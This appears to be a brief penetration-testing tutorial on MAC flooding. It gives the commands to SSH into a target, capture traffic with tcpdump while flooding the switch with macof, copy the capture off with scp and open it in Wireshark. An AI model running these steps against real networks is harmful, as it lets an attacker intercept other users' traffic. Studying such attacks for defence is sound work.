MAC Flooding Attack

It is a technique that compromises the security of network switches.

Attack Flow

1. Open Two SSH Sessions

   Start the SSH session 1 in terminal 1.

    ssh victim@<target-ip>

Start the SSH session 2 in terminal 2.

1. Flood the Switch and Capturing the Traffic

   In the session 1, start tcpdump and keep it running.

    tcpdump -A -i eth1 -w /tmp/tcpdump.pcap

In the session 2, start flooding the switch (here "eth1" interface).

    macof -i eth1

After about 30 seconds, stop **macof** and **tcpdump**.

1. Investigate the Captured Traffic

   In your local machine, transfer the dumped file named "/tmp/tcpdump.pcap" from the target machine to your local machine.

    scp victim@<target-ip>:/tmp/tcpdump.pcap .

Investigate this file using Wireshark

    wireshark ./tcpdump.pcap